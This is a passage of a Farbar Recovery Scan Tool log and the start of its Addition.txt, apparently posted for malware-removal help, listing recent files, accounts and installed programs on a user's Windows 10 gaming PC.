2022-07-15 22:41 - 2022-07-15 22:41 - 008551608 _____ (Malwarebytes) C:\Users\Miggy\Downloads\AdwCleaner.exe
2022-07-15 22:32 - 2022-07-16 14:43 - 000080864 _____ C:\Users\Miggy\Downloads\Addition.txt
2022-07-15 22:31 - 2022-07-21 17:22 - 002369536 _____ (Farbar) C:\Users\Miggy\Downloads\FRST64.exe
2022-07-15 22:31 - 2022-07-21 17:22 - 000025117 _____ C:\Users\Miggy\Downloads\FRST.txt
2022-07-15 22:31 - 2022-07-21 17:22 - 000000000 ____D C:\FRST
2022-07-15 18:39 - 2022-07-15 18:40 - 060178785 _____ C:\Users\Miggy\Downloads\dokkan-scout.exe
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D C:\Users\Miggy\AppData\Local\Enverr
2022-07-13 22:29 - 2022-07-13 22:29 - 000000220 _____ C:\Users\Miggy\Desktop\Garry's Mod.url
2022-07-13 18:34 - 2022-07-13 18:34 - 000693248 _____ C:\WINDOWS\system32\FsNVSDeviceSource.dll
2022-07-13 18:34 - 2022-07-13 18:34 - 000470528 _____ (curl, hxxps://curl.se/) C:\WINDOWS\SysWOW64\curl.exe
2022-07-13 18:34 - 2022-07-13 18:34 - 000026624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mode.com
2022-07-13 18:34 - 2022-07-13 18:34 - 000018944 _____ C:\WINDOWS\SysWOW64\WsdProviderUtil.dll
2022-07-13 18:34 - 2022-07-13 18:34 - 000017920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tree.com
2022-07-13 18:34 - 2022-07-13 18:34 - 000012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\chcp.com
2022-07-13 18:33 - 2022-07-13 18:33 - 002260480 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000640512 _____ C:\WINDOWS\system32\SettingSyncDownloadHelper.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000530944 _____ (curl, hxxps://curl.se/) C:\WINDOWS\system32\curl.exe
2022-07-13 18:33 - 2022-07-13 18:33 - 000288768 _____ C:\WINDOWS\system32\Windows.Management.InprocObjects.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000270848 _____ C:\WINDOWS\system32\EsclScan.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000152064 _____ C:\WINDOWS\system32\EsclProtocol.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000061952 _____ C:\WINDOWS\system32\printticketvalidation.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000057344 _____ C:\WINDOWS\system32\APMonUI.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\mode.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000024576 _____ C:\WINDOWS\system32\WsdProviderUtil.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\tree.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\chcp.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000011811 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2022-07-13 18:26 - 2022-07-13 18:26 - 000000000 ___HD C:\$WinREAgent
2022-07-12 17:37 - 2022-07-12 17:37 - 000000000 ____D C:\Users\Miggy\AppData\Local\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000001032 _____ C:\Users\Public\Desktop\ONN..lnk
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\Program Files (x86)\ONN
2022-07-12 17:36 - 2019-10-10 08:59 - 000024784 _____ (0) C:\WINDOWS\system32\Drivers\HHTHid.sys
2022-07-12 17:36 - 2019-10-10 08:59 - 000023896 _____ (0) C:\WINDOWS\system32\Drivers\HHTHidMouFiltr.sys
2022-07-12 17:35 - 2022-07-12 17:36 - 091204040 _____ () C:\Users\Miggy\Downloads\Onn Setup20211115V1.0.0.5.05 (1).exe
2022-07-12 17:35 - 2022-07-12 17:35 - 091204040 _____ () C:\Users\Miggy\Downloads\Onn Setup20211115V1.0.0.5.05.exe
2022-07-11 22:18 - 2022-07-11 22:18 - 000000223 _____ C:\Users\Miggy\Desktop\Fears to Fathom - Episode 2.url
2022-07-11 16:14 - 2022-07-11 16:14 - 000000000 ____D C:\Program Files\EA Games
2022-07-10 16:25 - 2022-07-10 16:25 - 000000000 ____D C:\Users\Miggy\Documents\New folder
2022-07-07 22:26 - 2022-07-09 19:54 - 000000000 ____D C:\Program Files\Mozilla Firefox
2022-07-05 18:55 - 2022-07-14 16:27 - 000000000 ____D C:\Program Files (x86)\Origin Games
2022-07-05 18:55 - 2022-07-05 18:55 - 000000000 ____D C:\Users\Miggy\AppData\Local\Haze1
2022-07-05 18:54 - 2022-07-05 18:54 - 000001066 _____ C:\Users\Public\Desktop\Origin.lnk
2022-07-05 18:54 - 2022-07-05 18:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2022-07-05 18:54 - 2022-07-05 18:54 - 000000000 ____D C:\Program Files (x86)\Origin
2022-07-05 18:53 - 2022-07-14 20:33 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Origin
2022-07-03 14:39 - 2022-07-17 19:45 - 000000000 ____D C:\Users\Miggy\Documents\WB Games
2022-07-03 14:39 - 2022-07-03 14:39 - 000000000 ____D C:\Users\Miggy\AppData\Local\Downloaded Installations
2022-06-27 18:02 - 2022-06-27 18:02 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Ardent Studios
2022-06-27 18:01 - 2022-06-27 18:01 - 000000223 _____ C:\Users\Miggy\Desktop\Smithworks.url
2022-06-24 21:24 - 2022-06-24 21:24 - 000000000 ____D C:\Users\Miggy\Documents\Telltale Games
2022-06-24 17:10 - 2022-06-24 17:10 - 000000000 ____D C:\Users\Miggy\Documents\Square Enix
2022-06-23 22:51 - 2022-06-23 22:51 - 000000000 ____D C:\Users\Miggy\AppData\Local\TJoC_R
2022-06-22 22:58 - 2022-07-18 20:39 - 000001130 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk
2022-06-22 20:31 - 2022-06-22 20:31 - 000000000 ____D C:\Users\Miggy\AppData\Local\Visage
2022-06-21 13:02 - 2022-06-21 13:02 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Mediatonic
2022-06-21 13:02 - 2022-06-21 13:02 - 000000000 ____D C:\Users\Miggy\AppData\Local\EOSUserHelper
2022-06-21 12:26 - 2022-06-22 20:22 - 000000000 ____D C:\Users\Miggy\AppData\Local\TwistedCarnivalDemo2
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2022-07-21 17:22 - 2020-07-31 19:24 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\discord
2022-07-21 17:21 - 2020-11-24 16:45 - 000000000 ____D C:\Program Files (x86)\Steam
2022-07-21 17:19 - 2020-07-31 19:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\Discord
2022-07-21 17:15 - 2020-07-31 18:23 - 000000000 ____D C:\Program Files (x86)\Google
2022-07-21 17:08 - 2019-12-07 02:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-07-21 17:03 - 2020-02-05 16:06 - 000000000 ____D C:\ProgramData\NVIDIA
2022-07-21 17:02 - 2020-08-02 14:57 - 000000000 ____D C:\ProgramData\Origin
2022-07-21 16:49 - 2021-11-03 16:17 - 000000000 ____D C:\Users\Miggy\AppData\Local\Origin
2022-07-21 16:06 - 2020-07-31 19:11 - 000000000 ____D C:\Users\Miggy\AppData\Local\Spotify
2022-07-21 15:26 - 2021-07-09 21:35 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Mozilla
2022-07-21 15:23 - 2020-07-31 20:07 - 000000000 ____D C:\Users\Miggy\AppData\Local\CrashDumps
2022-07-21 15:22 - 2021-11-13 19:25 - 000004152 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{1A3EA42E-993D-412D-B564-43DC52E6644C}
2022-07-21 15:22 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-07-21 15:19 - 2020-08-04 16:40 - 000000000 ___RD C:\Users\Miggy\Creative Cloud Files
2022-07-21 15:19 - 2020-07-31 19:08 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Spotify
2022-07-21 15:19 - 2020-07-31 18:18 - 000000000 ___RD C:\Users\Miggy\OneDrive
2022-07-20 23:01 - 2020-08-04 16:37 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2022-07-20 20:49 - 2022-01-10 16:17 - 000001976 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk
2022-07-20 20:49 - 2021-07-09 21:35 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2022-07-20 20:49 - 2020-08-13 00:26 - 000002438 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-07-20 20:49 - 2020-07-31 20:28 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat
2022-07-20 20:49 - 2020-07-31 19:48 - 000000000 ____D C:\ProgramData\Riot Games
2022-07-20 20:49 - 2020-02-11 17:44 - 000001209 _____ C:\ProgramData\NvcDispCorePlugin.log_backup1
2022-07-20 20:49 - 2020-02-05 16:07 - 000022478 _____ C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1
2022-07-20 20:49 - 2020-02-05 16:07 - 000017940 _____ C:\ProgramData\NVDisplayContainerWatchdog.log_backup1
2022-07-20 16:28 - 2021-03-15 13:17 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-07-20 14:56 - 2021-03-15 13:25 - 000840598 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-07-20 14:56 - 2019-12-07 02:13 - 000000000 ____D C:\WINDOWS\INF
2022-07-20 14:53 - 2022-05-17 17:09 - 000002493 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk
2022-07-20 14:53 - 2022-05-12 17:24 - 000001386 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2022-07-20 14:53 - 2022-01-25 18:36 - 000005016 _____ C:\ProgramData\rsEngine.config.backup
2022-07-20 14:53 - 2020-07-31 18:24 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-07-20 14:50 - 2019-12-07 02:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-07-20 14:49 - 2021-03-15 13:21 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-07-20 14:49 - 2021-03-15 13:17 - 000008192 ___SH C:\DumpStack.log.tmp
2022-07-20 14:49 - 2020-07-31 18:36 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2022-07-20 14:49 - 2019-12-07 02:03 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2022-07-20 12:12 - 2020-11-06 18:11 - 000000000 ___HD C:\adobeTemp
2022-07-20 12:11 - 2020-07-31 18:24 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2022-07-20 12:08 - 2021-03-15 13:21 - 000003536 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2022-07-20 12:06 - 2020-08-04 16:36 - 000000000 ____D C:\Program Files\Common Files\Adobe
2022-07-19 17:55 - 2020-08-01 19:19 - 000001270 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk
2022-07-19 16:43 - 2020-07-31 20:17 - 000000000 ____D C:\Program Files\Riot Vanguard
2022-07-18 23:05 - 2022-01-10 16:18 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\slobs-client
2022-07-18 20:58 - 2021-12-10 22:51 - 000003592 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-2826498334-1472090739-1589450912-1002
2022-07-18 20:58 - 2021-03-15 13:21 - 000003364 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2826498334-1472090739-1589450912-1002
2022-07-18 20:58 - 2021-03-15 13:18 - 000002383 _____ C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-07-17 23:16 - 2021-01-02 18:45 - 000000000 ____D C:\Users\Miggy\AppData\Local\Battle.net
2022-07-17 18:45 - 2022-05-28 20:04 - 000000000 ____D C:\Program Files (x86)\Overwatch
2022-07-17 18:37 - 2020-08-01 09:48 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-07-17 18:36 - 2021-01-02 18:45 - 000000000 ____D C:\Program Files (x86)\Battle.net
2022-07-17 17:51 - 2021-01-12 22:42 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Temp
2022-07-16 21:09 - 2022-02-09 20:48 - 000000000 ____D C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38
2022-07-16 12:06 - 2020-08-13 00:26 - 000002276 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2022-07-14 14:33 - 2022-06-05 15:02 - 000000000 ____D C:\Users\Miggy\Documents\MEGAsync Downloads
2022-07-13 23:07 - 2021-03-15 13:17 - 000257904 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2022-07-13 23:06 - 2021-03-15 13:18 - 000000000 ____D C:\Users\Miggy
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SystemResources
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\setup
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\DDFs
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2022-07-13 22:47 - 2020-08-01 12:57 - 000001425 _____ C:\Users\Miggy\Desktop\Roblox Player.lnk
2022-07-13 22:47 - 2020-08-01 12:52 - 000001248 _____ C:\Users\Miggy\Desktop\Roblox Studio.lnk
2022-07-13 22:47 - 2020-08-01 12:52 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox
2022-07-13 18:36 - 2019-12-07 02:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2022-07-13 18:33 - 2021-03-15 13:19 - 003010560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2022-07-13 18:26 - 2020-08-01 15:02 - 000000000 ____D C:\WINDOWS\system32\MRT
2022-07-13 18:23 - 2020-08-01 15:02 - 146546848 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2022-07-13 18:22 - 2020-01-24 10:48 - 000000000 ____D C:\Program Files (x86)\AMD
2022-07-12 13:10 - 2020-10-08 10:01 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\SurvivioSteam
2022-07-11 22:21 - 2022-01-22 00:32 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Rayll
2022-07-11 01:10 - 2021-03-19 22:09 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Vortex
2022-07-11 00:47 - 2022-04-09 15:31 - 000000000 ____D C:\Users\Miggy\AppData\Local\FalloutNV
2022-07-11 00:46 - 2021-12-28 23:14 - 000000000 ____D C:\Users\Miggy\AppData\Local\Fallout4
2022-07-10 19:31 - 2021-05-01 00:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\BattlEye
2022-07-10 16:26 - 2022-06-19 19:14 - 000000000 ____D C:\Users\Miggy\Documents\Electronic Arts
2022-07-10 16:17 - 2020-08-04 16:36 - 000000000 ____D C:\Program Files\Adobe
2022-07-10 16:04 - 2020-10-10 20:06 - 000000000 ____D C:\Users\Miggy\Documents\My Games
2022-07-10 15:38 - 2021-07-16 15:06 - 000000000 ____D C:\Users\Miggy\AppData\Local\Ubisoft Game Launcher
2022-07-09 19:54 - 2021-07-09 21:35 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2022-07-08 21:35 - 2021-11-22 21:01 - 000144872 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamelaunchhelper.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 002754024 _____ (Microsoft Corporation) C:\WINDOWS\system32\xgameruntime.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000402920 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameplatformservices.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000234984 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingservicesproxy.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000198096 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameconfighelper.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000131072 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingtcuihelpers.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000067048 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamemodcontrol.exe
2022-07-08 20:35 - 2021-10-15 21:59 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2022-07-07 15:34 - 2020-07-31 20:34 - 000000000 ____D C:\Users\Miggy\AppData\Local\D3DSCache
2022-07-05 15:18 - 2022-03-12 10:58 - 000000000 ____D C:\Users\Miggy\Desktop\RPCS3
2022-07-02 23:24 - 2020-01-24 10:41 - 000000000 __RHD C:\Users\Public\AccountPictures
2022-06-26 22:13 - 2020-08-23 13:56 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\MMFApplications
2022-06-25 14:08 - 2020-01-24 10:41 - 000000000 ____D C:\ProgramData\Packages
2022-06-23 22:51 - 2020-07-31 20:34 - 000000000 ____D C:\Users\Miggy\AppData\Local\UnrealEngine
2022-06-23 18:25 - 2022-06-05 14:55 - 000000000 ____D C:\Users\Miggy\AppData\Local\MEGAsync
2022-06-22 22:58 - 2020-09-25 11:07 - 000000000 ____D C:\Users\Public\Documents\Adobe
2022-06-22 22:48 - 2020-08-04 16:37 - 000000000 ____D C:\ProgramData\Adobe
2022-06-22 20:30 - 2022-05-12 17:28 - 000000000 ____D C:\XboxGames
2022-06-22 20:30 - 2020-07-31 18:16 - 000000000 ____D C:\Users\Miggy\AppData\Local\Packages
2022-06-22 17:19 - 2020-08-04 16:35 - 000000000 ____D C:\Users\Miggy\AppData\Local\Adobe
2022-06-22 17:19 - 2019-07-31 00:08 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2022-06-21 23:56 - 2021-10-03 18:40 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\PowerLine Studios
2022-06-21 13:02 - 2021-12-29 17:50 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\EasyAntiCheat
2022-06-21 11:46 - 2020-08-01 22:42 - 000000000 ____D C:\Program Files\Epic Games
==================== Files in the root of some directories ========
2021-05-18 08:49 - 2021-10-15 16:59 - 000000032 _____ () C:\Users\Miggy\AppData\Roaming\.machineId
2021-01-20 10:18 - 2021-01-20 10:18 - 000000116 _____ () C:\Users\Miggy\AppData\Roaming\debug.log
2022-03-08 21:51 - 2022-03-08 22:04 - 000000055 _____ () C:\Users\Miggy\AppData\Roaming\grizzly.ini
2020-11-28 13:16 - 2020-11-28 13:16 - 000000098 _____ () C:\Users\Miggy\AppData\Roaming\LauncherSettings_live.cfg
2020-11-28 12:39 - 2020-11-28 12:39 - 000002577 _____ () C:\Users\Miggy\AppData\Roaming\TheHunterSettings_live.bin
2020-11-28 13:06 - 2020-11-28 13:06 - 000000048 _____ () C:\Users\Miggy\AppData\Roaming\TheHunterSettings_steam_live.cfg
2020-08-04 16:43 - 2020-08-04 16:43 - 000000000 _____ () C:\Users\Miggy\AppData\Local\oobelibMkey.log
2021-10-18 17:32 - 2021-10-18 17:32 - 000016438 _____ () C:\Users\Miggy\AppData\Local\partner.bmp
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ========================
And here is Addition.txt
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 21-07-2022
Ran by Miggy (21-07-2022 17:23:15)
Running from C:\Users\Miggy\Downloads
Microsoft Windows 10 Home Version 21H2 19044.1826 (X64) (2021-03-15 20:22:02)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
(If an entry is included in the fixlist, it will be removed.)
Administrator (S-1-5-21-2826498334-1472090739-1589450912-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2826498334-1472090739-1589450912-503 - Limited - Disabled)
Guest (S-1-5-21-2826498334-1472090739-1589450912-501 - Limited - Disabled)
Miggy (S-1-5-21-2826498334-1472090739-1589450912-1002 - Administrator - Enabled) => C:\Users\Miggy
WDAGUtilityAccount (S-1-5-21-2826498334-1472090739-1589450912-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
7-Zip 21.02 alpha (x64) (HKLM\...\7-Zip) (Version: 21.02 alpha - Igor Pavlov)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 5.7.1.1 - Adobe Inc.)
Adobe Genuine Service (HKLM-x32\...\AdobeGenuineService) (Version: 7.7.0.35 - Adobe Inc.)
Adobe Illustrator 2022 (HKLM-x32\...\ILST_26_3_1) (Version: 26.3.1 - Adobe Inc.)
Adobe Photoshop 2022 (HKLM-x32\...\PHSP_23_4_2) (Version: 23.4.2.603 - Adobe Inc.)
Adobe Premiere Pro 2022 (HKLM-x32\...\PPRO_22_5) (Version: 22.5 - Adobe Inc.)
AMD Radeon Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 19.10.16 - Advanced Micro Devices, Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
Balanced (HKLM-x32\...\{0EA45DD4-A825-420C-AFED-C659EFE3B84F}) (Version: 4.00.0000 - Advanced Micro Devices, Inc.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Discord (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Discord) (Version: 0.0.309 - Discord Inc.)
Dolphin (HKLM-x32\...\Dolphin) (Version: 5.0 - Dolphin Team)
EA app (HKLM\...\{C2622085-ABD2-49E5-8AB9-D3D6A642C091}) (Version: 12.0.231.5217 - Electronic Arts) Hidden
EA app (HKLM-x32\...\{c5b4b74e-fcb0-4603-b92d-3d17c96a6d69}) (Version: 12.0.231.5217 - Electronic Arts)
Epic Games Launcher (HKLM-x32\...\{0EE6DDEF-E36B-45EB-9E03-5A266EC8A8F8}) (Version: 1.1.279.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Epic Online Services (HKLM-x32\...\{4B31654B-80C2-405C-91C9-49B14AEB0F42}) (Version: 2.0.32.0 - Epic Games, Inc.)
Fallout: New Vegas (HKLM-x32\...\Fallout: New Vegas_is1) (Version: - )
FL Studio 20 (HKLM-x32\...\FL Studio 20) (Version: - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version: - Image-Line)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 103.0.5060.134 - Google LLC)
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
MEGAsync (HKLM-x32\...\MEGAsync) (Version: - Mega Limited)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 103.0.1264.62 - Microsoft Corporation)
Microsoft Edge WebView2 Runtime (HKLM-x32\...\Microsoft EdgeWebView) (Version: 103.0.1264.62 - Microsoft Corporation)
Microsoft GameInput (HKLM-x32\...\{A9CFD6A1-C0D3-7F37-C220-8B104867EF15}) (Version: 10.1.22621.1011 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\OneDriveSetup.exe) (Version: 22.141.0703.0002 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{7B1FCD52-8F6B-4F12-A143-361EA39F5E7C}) (Version: 3.67.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 (HKLM-x32\...\{042d26ef-3dbe-4c25-95d3-4c1b11b235a7}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{9dff3540-fc85-4ed5-ac84-9e3c7fd8bece}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664 (HKLM\...\{010792BA-551A-3AC0-A7EF-0FAB4156C382}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40664 (HKLM\...\{53CF6934-A98D-3D84-9146-FC4EDF3D5641}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
